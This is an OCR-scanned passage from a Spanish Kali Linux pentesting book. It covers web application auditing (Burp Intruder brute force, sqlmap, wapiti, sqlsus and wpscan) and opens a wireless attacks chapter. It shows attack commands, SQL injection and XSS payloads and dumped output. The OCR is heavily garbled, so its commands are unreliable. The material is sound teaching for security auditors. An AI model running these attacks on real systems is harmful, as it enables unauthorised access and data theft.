ademas  de  proveer  de  cantidad  de  listados  de  rutas  con  direetorios  y  ficheros  sensibles. 

Suite  junto  con  su  herramienta  Intruder,  es  una  solution  graficamente  intuitiva  y  versa  til, 
Td  que  esta  consta  de  multitud  de  opc tones  que  permiten  el  procesamiento  de  los  diccionarios 
inclusive  con  esta  version  gratuita.  Para  realizar  un  ejemplo  practice)  de  ataque  con  procesamiento  de 
diccionarios,  se  utihzara  una  prueba  de  coneepto  con  un  Basic  Authentication ,  en  el  que  se  deberan 
dc  incluir  un  punto  d c  fuzzing  dentro  de  la  cabecera  de  una  peticion  1  PI  TP,  un  diccionario,  un  prefi jo 
}'  tma  codificacion. 


HI  auditor  se  encuentra  con  el  siguienie  acccso.  el  dial  debera  de  realizar  el  ataquc  intereeptand 
peticion  que  transporla  un  usuario  y  conirasena  ficticios. 


Imuiien  05.32:  Authorization  Required. 

A1  llegar  ia  peticion  a  la  pestafia  Intercept  dc  Burp  Suik\  es  reenviada  al  Intruder  para  trabajmr  con 
esla.  Payload  Positions*  define  el  lugar  de  ataque  donde  realizar  el  aiaque  por  diccionario,  cn  ; 
case  la  ca bee era  dc  Authorization:  Basic  debera  de  ser  seieccionada,  pues  se  transporta  el  usuario 
junto  a  las  credenciales  introducidas  con  anterior! dad,  eodificada  en  Base64. 


Imaged  05,33:  Payload  Positions. 

l  a  siguienie  y  ultima  pestafia  de  configuracion,  es  la  dc  Payloads.  Se  elegir&  el  diccionario  del  cual 
de  realizaran  las  peticiones  dentro  de  Payload  Options,  ademis  del  procesamiento  en  este  caso 
especial  debido  a  la  codificaeibn.  ' 

La  parte  baja  del  formulario*  expone  mult  hud  de  procesamientos  como  la  neeesidad  dc  incluir  djj 
este  ejemplo,  el  prefijo  que  transportara  el  nombre  de  usuario  admin  junto  con  la  tlineional^ 
Base64 -encode  para  afeclar  a  todo  el  payload l 
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,jj  Payload  Options  [Simple  list] 
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[pj  Payload  Processing 
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y£  Add  PreriK  admin 

0  Ba  se64-en  caste 

Iryiagen  05,34:  Procesannienio  del  Payload, 


L>e  csta  manera,  estarati  eonfiguradas  las  opciones  necesarias  para  que  el  auditor  se  dirija  a  Intruder 
>  Start  A  tack. 


Imogen  D5.35:  Redirect  ion  301  a  eonteJiidos, 

Los  resultados  de  Burp  Suite,  facilitan  (mediante  la  deteccidn  del  eddigo  de  respuesta  que  el  servidor 
er>via  a  eambio  do  la  petition),  deleetar  euales  ban  si  do  las  credencialos  postblemente  validas,  La 
redirecci6n  301 ,  indica  on  eslc  caso  que  la  respuesta  no  ha  sido  el  eddigo  d e  Authorization  Required, 
lo  que  es  posible  acceder  al  directorio  con  el  usuario  admin  y  la  contrasefla  definida  on  la 
P°sici6ri  numero  cuatro  del  payload. 


Escaneres  de  vulnerabilidadcs  web 

[>entro  de  una  auditor!*  de  seguridad  es  neeesario  en  algunos  eases,  cicrta  sutileza  en  el  desplicgue 
de  ataque,  eon  lo  que  medidas  automat izadas  puede  n  realizar  un  numero  de  peticiones  o  nivelcs  de 
alerta  frente  a  un  IDS,  que  deriven  en  la  inestabilidad  de  eonexiones  usuales*  Es  por  este  rtiotivo 
por  el  cual  normal  men  te  se  realizan  los  ataques  con  herramientas  en  3  os  horarios  noctumos,  eon 
d  objetivo  de  no  incomodar  la  navegacidn  normal  de  los  usuarios,  en  los  horarios  en  los  cuales  se 
necesita  de  un  alio  rendimiento  de  cara  a  los  servidores.  No  obstante,  es  posible  la  utilization  de 
aplicaciones  con  configuraciones  que  en  algunos  cases,  puedan  llegar  a  limitar  la  agresividad  de  Ins 
mismas, 

Kali  Linux  incorpora  un  gran  numero  de  utilidades  automatizadas,  para  la  detection  de 
vulnerabilidades  Web. 

En  este  amp  I  in  listado  se  incluye  algunas  tan  conocidas  conio  w3qf  Wapiti  sqlmap  o  xsser  entre 
otras. 

La  herramienta  sqlmap ,  esta  diseSada  para  realizar  test  de  penetration  en  bases  de  dates.  Esia  se 
encuentra  de  lornia  gratuita  al  igual  quo  su  cod i go  fuente,  y  automatize  el  proeeso  de  deteccion  y 
explotacidn  de  las  v ulnerabilidades  SQL  Injection  vistas  en  puntos  anteriores.  La  aplicactdn  sqlmap 
esta  desarrotlnda  cn  Python,  con  lo  que  es  multiplataforma, 

A  continuacidn  se  muestran  los  modificadores  mas  ulilizados,  para  indicar  a  dicha  aplicacidn  los 
diferenlcs  m&odos  de  extraccidn; 

-  -Li  URL;  Se  define  la  pagina  objetivo, 

-  -p:  Se  incluye  el  pardmetro  vulnerable. 

-  -dbs:  Muestra  el  nombre  de  todas  las  bases  de  dates. 

-D:  Selecciona  el  nombre  de  la  base  de  datos  donde  se  realizaran  las  consul tas.  1 

-  —tables;  Muestra  el  nombre  de  las  tablas  de  la  base  de  datos  select ionada. 

-  -T:  Selecciona  el  nombre  de  la  tabla  donde  se  realizaran  las  consultas.  1 

-  ’•-columns:  Muestra  el  nombre  de  las  columnas  de  la  tabla  selecc  ionada. 

—dump:  Extrae  los  datos  de  la  tabla  seleccionada  a  un  fichero  con  extension  esv. 

-  -dbms:  Permite  seleccionar  el  motor  dc  base  de  datos  que  utiliza  la  consulta:  SQL, 

MySQL t  ORA CLE . ..  j  Tl 

I  n  la  siguiente  imagen  se  puede  observar  la  explotacion  dc  una  pagina  vulnerable  a  SQL  Injection. 
la  cual  es  explotada  con  exito  desde  sqlmap  mostrando  la  consul  la  a  llevar  a  cabo  en  consola.  il 

(  omu  se  puede  apreciar  en  la  imagen,  de  forma  autpmitica  sqlmap  tambten  extrae  in  formation 
intcresanie  para  realizar  un  buen  Fingerprintings  mostrando  datos  relatives  al  sistema  operative, 
tecnologias  y  versiones  de  la  base  de  datos. 
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r55TP!TaTr:/u'ti p  /sh.u  e/sql  Wi-ip#  sqlmap  -  - y  rL -"tit t p :  //4n0nymBuft/p ru'oba'B/'sq'I 1 7sql  1  . pff 
i7ib«13GH  -p  "id'1  - 'dbms^mysql  - -to*hrdqu*s"|jM 

sq\fflap/l -3-dev  -  automatic  SQL  injection  and  database  takeover  tool 
bx rp://»ql mftp.org 

[II  legal  dKcUimor;  Usage  of  sqUap  for  attacking  targets  without  prior  mutual 
consent  is  Illegal-  It  is  th®  and  us s  responsibility  to  obey  all  applicable 
ocal,  state  and  federal  laws.  Developers  assume  no  liability  and  are  not  respc 
Sible  tor  any  misuse  or  damage  caused  by  this  program 


\J  starting  at  19:0»:43 


[  19:09; 43]  [INFOJ  testing  connection  to  the  target  url 
19:09:43]  [  TMFO]  heuristics  detected  page  mar  sot  'ascii 

sql mao  identified  the  following  injection  points  with  a  total  of  0  HTTPls)  requc 
its; 


slaco:  GET 

Parameter;  id 

Type:  UNION  query 
Title:  MySQL  UNION  query  (NULL) 
Payload:  id=10G  UNION  ALL 
2745161  b4 ,0*3a6ti6i6f3a)  ,NUlL# 


,0j£7iSSEa4a4cfi 


19:09:43]  [INFO]  testing  MyS* 

[19:03:43]  [INFO]  confirming  MySQL 
19:09:43]  [INFO]  the  back  end  &6M®  is 

Meb  server  operating  system;  Windows 
veb  application  technology;  Apacne  2,2-11*  PHP  5. 2,9 
sack -end  DBMS:  MySQL  5.0,0 

19:09:43]  [  INFO]  fetched  data  logged  to  te,  t  files  under  ‘  -/output  /4n9nymCfue 1 


Imogen  05,36:  SQL  inject  tan  con  sqimap, 


La  herramienta  w3af,  cs  una  aplicacion  de  codigo  abierto,  con  la  cual  es  posible  auditar  y  cxplotar 
vulnerabilidades  web.  Consta  de  cuatro  pes tafias  utiles,  las  cualcs  permiten  de  tbrina  ordenada 
orgunizar  diferentes  perfiles  de  explotacion,  destaeando  el  perfil  OWASP  Top  Tm  per  juntar  las 
vulnerabilidades  mas  comunes,  comprobarel  estado  de  los  ataques  mediante  la  pestana  de  Log  y  la 
eomprobacion  de  resultados  finales  junto  con  la  explotacion  de  los  mismos. 


Imaged  05,37;  E seiner n Saji 
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Pentesting  con  Kali 


Otra  forma  de  automatical'  cl  proccso  d  Q^pentesting,  cs  posible  gracias  a  la  herramienta  Wapiti.  Esie 
csaincr  perteneciente  a  OWASP  e  incluye  la  deteccidn  dc  los  siguientes  ataques  web:  jB 

*  File  Handling  Errors  (Local  y  remote  include/require,  /open,  readfile,  etcetera,*.) 

-  Database  Injection  (PHP/JSP/ASP  SQL  Injections  y  XPath  Injections)  .■ 

*  XSS  (Cross  Site  Scripting}  Injection  m 

-  LDAP  Injection 

Command  Execi  i ti  or  i  Detection  (e  \  a  I  (} ,  sys  tem  ( ) ;  pass  ti  ~u  () ...) 

CRLF  Injection  (HTTP  Response  Splitting  session  fixation...) 

Realizando  una  prueba  simple,  con  una  de  las  paginas  explotadas  de  forma  manual  con  anterioridad 
en  esle  capitulo,  es  posible  llevar  a  cabo  la  detection  con  Wapiti  de  un  Cross  Site  Scripting  refiejado, 

i:~#  wapiti  http: //4nQny mdas/p rue bas / xs s/xss . php 7use r =Admin 
nfapiti-1  -1.6  (wapiti  , sou rre forge. nat) 

Attacking  urls  (GET)... 

XSS  (user)  in  http ://4nOnym0us/pru«bas/xss/xss, php 

Evil  url :  http://4n0nym0us/pruebaB/xss/xss.php?usBr=3<script»vor+w«ipitl_6 
B7474?&3ii2f2f346e3&6e796d3G75732f70727565626l732f7B73732f7B73732e7&68 70  75736572 
^new+Bool ean ( ) ; </se  rlpt> 

Attacking  forms  (POST).., 

Looking  for  permanent  X5S 

■ . . rv7cnn  g  n  nnnnnnn  I  J 

limgeti  05.38:  XSS  con  Wapiti. 


Explotacion  de  bases  de  datos 

La  explotacion  de  vulnerabilidades  suele  ser  la  fase  mas  suculenta  para  todo  auditor  de  seguridad. 
Realizar  una  extraccion  de  datos  satisfactory  sin  comprometer  d  estado  del  si  sterna,  Uega  a  ser 
visto  en  seguridad  como  todo  un  arte.  Kali  Linux  ofrece  ties  herramientas  clave  para  la  explotacion 
de  bases  de  datos,  no  obstante  otras  herramientas  mas  amplias  como  sqlmap,  tambien  forman  parte 
como  se  moslro  en  el  punto  anterior.  Estas  herramientas  son  las  siguientcs: 


-  Bbsqt 

-  Sq  l ninja 

-  Sqlsus 


Para  exponer  la  extraccion  de  mformacidn  de  una  base  de  datos  mediante  una  inyeccifin  SQL,  se 
ha  elegido  la  herramienta  sqlsus.  Esta  es  una  aplicacion  de  cddigo  abieito  escrita  cn  Perl,  ia  cual 
permite  diferentes  opciones  para  realizar  una  explotacion.  Estas  opciones  pucden  ser  la  inclusion 
de  cualquier  tipo  de  consulta  manual,  la  desearga  de  archivos  del  servidor  con  el  conocido  metodo 
load  file,  e  inclusive  subir  y  ejecutar  un  backdoor  mediante  metodos  como  into  outfile,  Sqlsus  utilize 
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tlI1  fichero  de  conflguracion  para  lanzar  !os  ataques* *  el  fichero  es  possible  crearlo  desde  la  propia 
herramienta  con  la  sintaxis  sqlsus  -g  sqlsus.  amf  desde  consola.  Ediiando  el  fichero,  es  posible 
realize  las  modificaciones  pertinentes  para  la  correcta  configuraci6n  de  la  inyeccion,  tales  eomo  la 
p^gina  de  alaque,  el  parametro  vulnerable,  los  espaeios  entre  query  $  o  inclusive  la  forma  de  term  mar 
jjs  inyeeeiones  para  limpiar  el  posible  codigo  aobrante  entre  el  final  de  la  inyeeeion  y  el  incluido 
jesde  la  pagina  porel  desarrollador. 


'i-ql*iU"i-_gF,rTrirtFT  conf  -  ViM 

Artihivv  E  Jii  ,ii  Vi*; 

#  Start  of  the  url  used  for  the  injection 

#  in  inband/union  mods,  it  ls  generally  a  good  ides  to  append  "AMD  S'  so  that  t| 
he  real  query  returns  nothing 

#  Ex  :  our  $url  start  =  '  http;/Aocalhost/scrlpt  .php?ld~l '  ' ; 

our  $url  start  —  “http  ://4n0nym0us/pruQdas/SQll;,,'sqli.pr.p'Jid='lGfr ; 

#  End  ot  the  url  used  for  the  injection 

#  When  possible,  it  is  generally  a  good  idea  to  use  '#  '  hero,  so  that  aur  queri 
OS  won  t  be  polluted  oy  the  original  one 

#  Ex  ;  our  $url_end  = 
our  £url_and  - 

#  Use  POET  instead  of  GET 
our  tpost  -  0 ; 

#  Lise  blind  injection  ? 

#  set  it  to  1  for  boolean -based  blind  injection 

E  set  it  to  2  for  time-based  blind  inj  action  {  requires  MySQL  >=  5.  EM?) 

« _  1 

Imagcn  05,39:  Configuration  de  sqlsus, 


Para  realizar  la  carga  del  fichero,  basta  con  incluir  el  nombre  de  la  aplicacidn  junto  al  fichero  de 
conflguracion  sqlsus  sqlsus. conf 

■  o  >  fik  sqlsu*  sqlsus  ge  rfnan  ,  tonf 


sqlsus  version  0.7.2 

Copyright  fc]  SGOa-Se-ll  Jeremy  flu  f  fat  (sfltlvtJuf) 
+]  Session  "^nQnymQus"  loaded 

ql5U5>  | 


Imagen  05.40:  Carga  del  fichero  de  configured' on  de  sqlsus 


H  comando  start,  ianza  el  ataque  a  la  pagina  configurada  con  el  objetivo  dc  identificar  el  nombre  de 
la  base  de  dates,  su  version,  y  el  usuario  con  el  que  se  ejecutan  Sas  consultas. 


sqlsus^  start  ^ 

I UlVlGN  columns  already  set  to  (0,0,1*®!.  skipping  auto -detection, , .  (use  "au 
coconf  select ^columns"  to  do  it  anyway] 

[+3  fflM_urt_ltnflth  already  set  to  6193  ,  Skipping  auto -detect  ion ..  ( use  '  autoc 

anf  fflflX-Sendable"  to  do  it  anyway] 

[  +]  Filling  ^target ...  H 

* - - - ’* - - - - 


|  Variable  ]  Value  | 

. +  --  —  - . . . + 

|  database  |  poison?  | 

j  user  |  '  root 1  @ ‘let slhost 1 

j  version  |  5 .1 ,3? -community -log  | 

^ - - 

3  rows  In  sat 


sqlsus* 


Imagen  05.4 1 :  Carga  del  fichero  de  configuration  de  sqlsus. 
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Gracias  a  que  la  version  de  My  SQL  5 ,  incluye  las  iablas  de  la  base  de  datos  information  schema, 
es  posible  apiiearel  comandogtf/,  Sqtsus  incorpora  opciones  de  extraecion  de  ini'ormadon  con  est© 
ebmando,  el  cual  es  realmente  simple  de  comhinar  para  diferentes  usoa,  1 

A  conti  nuacidn  se  muestra  la  extraecion  de  las  tablas  de  la  base  de  daios  con  get  tables.  I 

&qlsu5>  get  tables 
>1  Getting  tables  names 

c(  poison2  )> 

[alerts] 

[alertsconfig] 

1  data domains ] 

[ddos] 

[ domains  1 

[ forms] 

[ ip2t 1  I 

[payloads) 

[zombies] 

[use rs] 

user 

passwo  rd 

sqlsu3>  B 

Imogen  05.42:  Extraecion  de  Lab 3 eon  sqbus. 


1  den tifica cion  de  CMS 

Dentro  de  este  apartado.  se  muestran  tres  herramientas  con  funcionalidades  inuy  dirigidas  haeia  im 
CMS  en  comun,  Word  Press.  Sin  duda  este  CMS  ha  aumentado  sn  popularidad  hasta  llegar  al  primer 
puesto  entre  los  mas  utilizados.  Es  poresta  cuestion.  por  la  que  se  incretnento  tambien  el  numero  de 
ataques  dispombles  en  Internet  y  el  forzado  aumento  de  herramientas  de  auditoria  de  seguridad.  No 
obstante,  tambien  es  posible  realizar  ataques  a  otros  sistemas  conocidos  como  phphb,  oscomercc  <> 
phpnuke.  Estas  tres  herramientas  se  tratan  de  BlindElephant, plecosl  y  wpscan.  ■ 


La  herramienta  BlindElephant ,  utiliza  una  sentencia  simple  para  identificar  versiones  de  diferentes 
tipos  de  CMS.  El  siguiente  ejemplo  muestra  como  introdueiendo  en  consola  Python  BiindEieplnnit- 
py  dominio.com  Movabletype ,  se  realiza  un  Fingerprinting  descubriendo  la  version  que  se  eneuentr* 
detras  de  este  si  sterna. 
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FT  iiltdl  i  i/usf  /}  ib/pyi  hori2, 7/dlst  -parkdQes/blindtltrphdnt#  python  EirndElephant  mavablerype 

^paded  /u&r/Ub/p¥thon2,7/dist-psckag0s/bUndalephant/dbs/fflovflb\otype,pki  with  1 01  versions,  2229  dif  farent  iat  ir 
g  paths,,  and  216  version  groups,  1 

Starting  01  indEtephant  fingerprint  for  version  of  movabletype  at  http;//. 

H i i  fit tp:/ /NR N RNH HR , t; on/ m t  ^ s t at i c /tfi t  -  j  s 

Possible  versions  based  on  result:  3.35-sn,  3.36-eri,  3.37-en,  3,30  en 

HI t  http: //  -  I HHi . c am/ mt-static/js/tc/cl lent , j s 
Possible  versions  based  on  result:  3.35'en,  3,36  en,  3.37*an,  3. 38  an 

Hit  http://  >  'T,;.  1  k-^S.cori/tcjols/ run -periodic -tasks 

-ile  produced  no  natch.  Error:  Fall  ad  to  reach  a  server;  Not  Found 


Hit  http: //l  --  . :  159 , c on /m t - s t et i c / c ss / 

-ile  d  reduced  no  notch.  Error:  Foiled  to 

Fingerprinting  resulted  in: 

3.35-en 
.36 -an 
37  -an 
.38 -en 

ist  Guess:  3,30-en 


t  v^r: 


Not 


>ttf  )Oj  aru  ati'iL. 


imagen  05.43:  Extraction  de  version  dv  Movable  type. 


La  herramienta  wpscan  escrita  en  Ruby,  es  un  esc&ner  mtegramente  orientado  a  la  realization  de 
auditorias  de  seguridad  en  WordPress,  Esta  aplicaeion  tiene  eomo  ftmcionalidades  destacadas.  el 
realizar  d  I  ist  ado  de  plugim  instalados*  ademas  de  un  reporte  de  vulnerabilidades  en  vers  tones  o 
inclusive  el  conocido  fallo  de  enumeracidn  de  usuarios.  La  siguiente  imagen  muestra  esto  ultimo 
mediante  la  sintaxis  wpscan  -urldomlnio.com  -enumerate  tt 

Enumerating  usernames  ... 

.+]  We  found  the  following  8  usemame/s  : 


id: 

1 

1 

name : 

admin 

nickname: 

admin 

id: 

2 

1 

name : 

lau re nee 

nickname; 

laurence 

Id: 

3 

1 

name: 

Alice  M 

nickname: 

Alice  M 

id: 

A 

1 

name: 

Steffen 

nickname: 

Steffen 

id: 

S 

name : 

Mayo 

nickname : 

Mayo 

id: 

6 

nama : 

aileen 

nickname; 

ail sen 

id :  7  |  name:  mandisi 
|  id:  0  j  name:  Tad 


+J  Finished  at  Thu  Apr 
4]  Elapsed  time;  50:00*10 
ootflkd  li :  


5i« 


Imagen  05.44:  Lxiraccion  usuarios  en  WordtPress . 


Ademas  muestra  infbnrmeion  segiin  la  version  de  WordPress,  consultando  la  existencia  de 

Vulnerabilidades  publicas. 


l+]  The  WordPrass  theme  in  use  is  twentyte 

M  XML •  RPC  Interface  available  under  httpM4\*U*flMHHMIW 
l  +  ]  WordPress  version  3,0  Identified  from  pneta  generator 

Wo  ha vo'  identified  1  vulnerabilities  from  the  version  number 


/ml  rpc  ,php 


■ 


Imagen  05.45:  Extraction  de  version  y  vulnerabilidades  publicas. 
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Pentesting  con  Kali 


Una  de  las  grandes  ventajas  de  wpsctin,  es  la  vclocidad  para  llevar  a  cabo  las  comprobaciones,  con  lo 
que  el  lislado  de  plugins  existentes,  es  recomdo  en  cuestion  de  scgundos  desde  su  diccionario,  { 'on 
ia  sintaxis  wpscan  -url  dominio.com  -enumerate  p.  es  posible  realizar  esta  accion. 

M  Enumerating  Installed  plugins  . 

Checking  for  2380  total  plugins.  ,.  180%  complete. 

[ 

j  Name:  si  t  &p  re  ss- multilingual -cims 

Location:  http:  /  /  -  c  ont  ant  /plugins/  sit  ep  re  ss -mult  il  ingual  -  c  ms/ 

|  Name:  supersi ids r- many 

Location:  http://  '■*'  -eon  tent /plugins/siiparslider -menu/ 

Imagen  05.46:  Enumcracion  de  plugins  instalados. 


+  ]  Wo  found  3  plugins: 


|  Nat-e;  sideborrabs 
|  Location:  httn:// 


Identification  de  IDS/IPS 

En  este  apartado  Kali  Linux  incluye  tan  solo  una  herramienta.  la  cuaf  permitc  al  auditor  identificar 
diferentes  pAginas  web  detras  del  tnismo  dominio,  dependiendo  del  lipo  dc  user  agent  con  el  que 
este  solicite  las  peticiones.  Por  defecto  este  script  en  Python,  incluye  un  diccionario  con  el  que 
realizar  las  comprobaciones. 


La  sintaxis  en  cousola  para  realizar  la  identificacidn  es  ua-tester  u  http://dominio.com 


[>J  Performing  initial  request  anti  confirming  stability 
{>]  Using  Usor  Agent  string  Mtj^  iU  s/5.0 


URL  (ENTERED):  https://www.worElprBss.coni 
URL  (FINAL) :  http://wordpress.CDm/ 
Response  Code:  301  Moved  Permanently 
Server:  ngin* 

Date:  Thu,  II  Apr  2013  14:55:40  G«t 
Content  - 1  ypa  :  rext/html;  charset =utfTB 
[  •  T ransfer-Encooing:  chunked 
E  j  Connection:  close 
[  1  Vary:  Accgpt -Encoding 
t  ]  Vary:  Cookie 
l  ]  Sat -Cookie:  wordpre5s_hoita| 

[  ]  Data  [ MQb] :  ac3759f f99cfii 


{  J 

111 
t  J 
[  ] 
[  ] 


-2013  14:55:40  GMl 


Imagen  05.47:  User  A  gem  Mozilia/5.0. 


Otra  de  ias  opciones  disponibles  cn  UATester ,  es  la  de  seleccionar  en  grupos  los  diferentes  user 

agents: 


-  (M)obile 

-  (D)esktop 

-  mis(C) 

-  (T)ools 
(B)ots 

-  e(X)treme 


65 


Cap  i  tub  V.  Audi  tor  ia  de  aplicaciones  Web 

t  on  lo  que  seria  posible  diseriminar  y  realizar  la  siguiente  orden:  ua-tesfer  -u  http://dominio.com 

-J&C 

I  > I  A g^r-T  5ih,,i«$  !  MoilVLj/2.  iS  [ e J 01  a '  *6k  Jmv&k) 

ill  Vary;  (lonhin 

I  p-I  User -Agent  String  :  manhot -ProducTfl/l  (+htTp  i  //i-earth  ,  inn  .tOU/mtiA&oL  .htn] 

(Hi  Vary ;  CiMkl* 

Uscr-Agant  String  ]  wncrswler 
III  Vary:  C»kie 


Imagen  05 8:  Selection  cte  grupos, 


Indexadores  web 

t  no  de  los  puntos  mas  importantes  frente  a  una  auditoria  web,  e&  realizar  un  listado  de  forma 
rceursiva  de  todos  aquellos  ficheros  y  directories  que  forman  la  pagina  a  auditar,  En  este  proeeso  se 
uiilizan  tanto  metodos  actives  como  pasivos,  con  el  objetivo  de  indexar  todas  las  rutas  posibles.  Kali 
Linux  incluye  multitud  de  herramientas  con  este  fin,  con  lo  que  cabe  la  posibilidad  de  reutilizar  las 


ipllicaeioncs  pertenecientes  a  la  section  de  proxys  inverses,  como  Burp  Suite ,  Vega  o  WebScarab 
entre  otros.  La  aplieackm  WebScarab  incluye  una  herramienta  Spider;  la  cual  permite  de  forma 
recursive  capturar  los  dominios  que  pasan  a  traves  de  su  Proxy  y  visualizarlos  en  forma  de  arbol. 


Imagen  05,49;  Caprura  dc  dominios  con  WebScarab. 
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Una  de  las  herramientas  no  comentadas  con  anlerioridad  y  quc  pueden  Hegar  a  facilitar  este  trabajo 
es  dirb.  Esia  aplicacion  incluye  la  opcidn  dc  niih/ar  diccionarios  para  complementer  ia  tarea  de 
indexacidn  mediante/wzrfwg.  ■ 

•  i  wkiii  i : /uii  /bUiy^Tdi  rb  hi  ■  pTV/www  .^n^l  pc^oin7""7us^9Fa^79,r^7wchr3rTsts7suiittll.  .t7T""-w" 


'  Ivj  «2.03 
3y  The  Dark  Rover 


3TART_TIME;  Thu  Apr  4  08:22:17  2013 
JRL_BA5E:  http  ://ww*i  .enslpe  . com/ 

ClROl.  1ST  FILES:  /  us  r/  she  re/di  rto/wo  rrfl  ists/siall  .t*t 
3PTXDN.:  Nest  Storing  on  warning  messages 


SENERATED  WORDS:  957 


Scanning  UHL:  http://www.cnelpc.con/ 
http ://www.enelpc . com/1000 

f FOUND:  500  [Internal  Server  Error]  Size; 
http://www.en.elpc  .com/2000 

(FOUND :  200  [Ok]  Size:  B7329) 
http://www.enel pc .con/2001 
(FOUND:  200  t OK J  -  SI  zb: 
http ; //www .enslpe  .coni/ 2  00 2 
(FOUND:  20O  [Ok)  -  Size: 
http://www.en.Bipc:  .eoift/2003 

(FOUND:  20®  [OKI  Size:  07329) 
http://www<enelpc .cpffl/2004 

(FOUND:  200  [Ok]  -  Size:  97331] 
http: //www , anal  pc . c  om/2095 

(FOUND:  203  [Okl  Size:  07329) 

>  Testing:  http ; //WWW.  •fiat  pc  .com/comenti 


4532) 


["Kano 


si 


frnagen  05.50:  Rutas  existentes  con  dirh. 


La  opcion  graiica  a  dirb,  es  otra  herramienta  similar  llamada  dir  bus  ter,  tambien  incorporada  dentro 
de  Kali  Linux. 

Otra  herramienta  interesante  es  cutycapt  >  la  cual  permite  realizar  capturas  de  pantalla  ehgiendo 
mediante  modificadores,  que  tipo  de  elementos  web  habilitar  o  no.  Puede  ser  una  herramienta 
imprescindible  a  la  hora  de  visual izar  una  pagina,  que  contenga  ejecucion  de  codigo  JavaScript 
exploits  cn  complementos  o  posible  malware.  Con  la  siguiente  sintaxis  es  posible  realizar  la  capture 
de  una  pagina  omitiendo  la  ejecucion  de  codigo  JavaScript:  'M 

Cutycapt  -url~http://www, iuenti.com/  —out~locaifile.png  JavaScript^ off  M 


Imogen  05.5 1 :  Cutycapt  con  JavaScript  deshabilrtado. 


Capitido  V.  A  udi  tori  a  de  apHcaciones  Web 
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Conclusiones 

kali  Linux  ofrece  un  gran  abanico  de  posibilidades  incorporando  tin  numero  extenso  de  utilidades 
canocidas,  evitando  al  auditor  perder  el  tiempo  de  busqueda,  descarga,  instalacion  y  eonflgumcion 
de  las  mismas. 

i on  esta  distribucidn,  es  posible  hacer  de  la  auditona  un  campo  de  aceion  ilimitado  para  d  auditor, 
pues  como  se  ha  querido  demostrar  en  este  eapitulo,  es  posibie  tanto  valerse  de  herramientas  que 
trabajan  a  nivel  de  cabeceras  que  componen  Lina  petition  H  TIP,  eomo  de  apHcaciones automatizadas 
que  con  apenas  configuracion,  son  capaces  de  realizar  explotaciones  de  vulnerabilidades  de  forma 
satisfactory  No  obstante,  es  recomendable  abrir  ese  abanico  de  posibilidades  de  forma  personal, 
agregando  aplicaciones  no  incluidas  en  la  suite  o  que  simplemente  trabajen  sobre  otros  sistemas 
operativos. 


Capitulo  VI.  A  toques  Wireless 
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Capitulo  VI 
Ataques  Wireless 


l.Tipos  de  ataques  inalambricos 

Los  ataques  de  tipo  inalambrico  siempre  ban  llamado  la  ateneion  del  gran  publico.  Cualquier 
usuario  del  mirndo  de  la  in  format!  ca  ha  intentado  llevar  a  cabo  un  ataque  de  este  ripo,  sobre  todo  a 
iec nolog ias  Wireless,  Un  simple  ejemplo  de  esto  podria  ser  euando  un  usuario  con  pocas  nociones 
dc  seguridad,  o  incluso  con  pocas  nociones  teenieas  informal  icas*  intenta  crackear  la  contrasena  de 
una  red  Wireless  para  obtener  acceso  a  Internet. 

Lo  realmente  interesante  de  cualquier  vector  de  ataque,  aparte  de  conocerlo,  es  saber  como  funciona 
y  como  las  her  rani  ieotas  que  se  uiilizan  realizan  las  acciones  para  explotar  los  fallos  de  eonfiguracidn, 
lallos  de  seguridad  o  el  propio  fallo  de  la  teenologia. 

En  la  distribution  de  Kali  Linux  existen  diversos  tipos  de  ataques  inalambricos,  Como  puede  ser 
normal  los  mas  conocidos  son  los  ataques  Wireless,  pero  no  son  los  unices,  Este  capitulo  se  cenirara 
en  los  ataques  Wireless,  pero  antes  de  el  lo  se  pretend e  enumerar  los  distintos  tipos  de  ataques  y  las 
aplicaciones  que  realizan  estos. 

La  teenologia  Bluetooth  es  una  especificaeion  para  redes  inalambricas  de  area  personal  (WPAN). 
Estas  redes  posibilitan  la  transmision  de  voz  y  datos  entre  diferentes  disposilivos  gracias  a  un  enlace 
Por  radiofrecueneia  en  la  banda  de  los  2,4  GHz.  Los  objetivos  de  esta  teenologia  son; 

Eliminar  los  dispositivos  atados.  es  deem  cables  y  conectores. 

Facilidad  en  las  comun  lead  ones  entre  dispositivos  moviles  y  fijos. 

-  (  reacibn  de  pequefias  redes  inalambricas. 

t  -  Sincronizacion  de  datos  entre  dispositivos, 

Hoy  en  dia  es  nvuy  comun  que  los  dispositivos  que  util  i/an  esta  teenologia  pertenezean  a  dispositivos 
Moviles  como  smartphones <  moviles,  PDAs,  portables,  camaras,  tmpresoras,  etcetera, 

Kali  Linux  se  incluyen  las  sigtiiemes  herramientas  para  realizar  pentesting  a  dispositivos  con 
tooth: 
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-  BTSctmtier.  Esta  herramienta  permite  extraer  informacidn  de  cualquiei  dispositive  con 
Bluetooth  que  se  encuentre  habilitado.  Sc  basa  ers  la  pi  I  a  de  BlueZ  que  viene  con  los  kernels 
de  Lima, 

-  Blueing.  Esla  herramienta  comen/6  siendo  un  escAner  pequefio  y  de  facil  interaction.  Sc 
podia  entender  eomo  otro  escaner  sencillo  para  dctectar  dispositivos  con  Bluetooth  active 
pero  evoluciono  y  lambien  permite  monitorizar  trifleo  Bluetooth. 

-  Bluemaho ,  Esta  herramienta  proporciona  una  shell-GUl  para  realizar  fun ci ones  de 

escaneo  de  dispositivos  Bluetooth,  asi  como  ejecular  exploits  de  vulnerabilidades  eonccidas 
en  el  protocoled  configumr  el  dispositivo*  almaeenar  resultados  en  una  base  de  dates,  etcetera. 
Una  herramiema  bastante  interesante  para  testear  Bluetooth .  ]■ 

-  Bluer  anger.  Es  un  script  en  bash  el  cual  permite  loealizar  dispositivos  de  radio  de 
Bluetooth  mediante  la  utilization  de  pings  para  la  creacidn  de  una  conexion  entre  distimas 
interfaces  Bluetooth. 

-  Fang.  lambien  conocida  como  redfang,  es  una  herramienta  que  permite  encomia? 
dispositivos  Bluetooth  ocultos. 

-  Spooftooph.  Esta  aplicacion  permite  automat  izar  el  proceso  de  suplantacion  o  donation 
de  dispositivos  Bluetooth. 

La  tecnologia  R K 1 1  >,  Radio Frecuency  Identification,  es  un  sistema  de  recuperation  y  almacenam  iemo 
de  dates  remote  que  es  utilizado  por  eliquetas,  taqetas,  tags  RFID.  Existen  distimas  categories  en 
Kali  Lima  para  estas  aplieaciones  y  en  cada  una  de  el  las  hay  numerosas  lierramientas  con  distintos 
fines.  Dichas  categorias  son  las  siguientes: 

-  RFIDiot  ACG.  ■  "V 

-  RFIDiot  FROSCH.  1 

-  RFIDiot  FCSC  9 


